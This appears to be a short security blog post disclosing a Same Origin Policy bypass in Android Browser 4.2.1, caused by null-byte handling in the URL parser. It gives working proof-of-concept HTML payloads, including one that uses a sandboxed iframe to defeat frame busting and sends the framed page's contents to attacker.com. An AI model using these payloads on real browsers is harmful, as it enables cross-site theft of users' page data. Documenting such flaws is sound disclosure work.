This Vulnerability was discovered by security researcher Rafay Baloch, SOP bypass vulnerability he found in my Qmobile Noir A20 running Android Browser 4.2.1, and later verified that Sony+Xperia+Tipo, Samsung galaxy, HTC Wildfire, Motrorolla etc are also affected.
According to Rafay the issue occurred due to improper handling of nullbytes by url parser.
Same Origin Policy (SOP) is one of the most important security mechanisms that are applied in modern browsers, the basic idea behind the SOP is the javaScript from one origin should not be able to access the properties of a website on another origin.
The origin is formed by the combination of Scheme, domain and port with the port being an exception to IE. There are some exceptions with SOP such the location property, objects wtih src attribute.
The following is a proof of concept:
<iframe name="test" src="http://www.rhainfosec.com"></iframe>
<input type=button value="test" onclick="window.open('\u0000javascript:alert(document.domain)','test')" >
We can see that the code tries accessing the document.domain property of a site loaded into an iframe. If you run the POC at attacker.com on any of the modern browsers, it would return a similar error as attacker.com should not be able to access the document.domain property of rhainfosec.com
A lot of websites still use frame busting code to prevent the page from being prevent and since we can only bypass SOP here when the site could be framed. In case, where the site is using a frame busting code, we can bypass it using the sandbox attribute that was introduced as a part of HTML5 specifications.
<iframe name="test" src="http://www.rhainfosec.com" sandbox></iframe>
<input type=button value="test"
onclick="window.open('\u0000javascript:var i=new Image();i.src='//attacker.com?'+document.body.innerHTML;document.body.appendChild(i);','test')" >
Update: A metasploit module has been released by jvennix-r7 which also supports x-frame-options bypass making it a completely universal exploit.
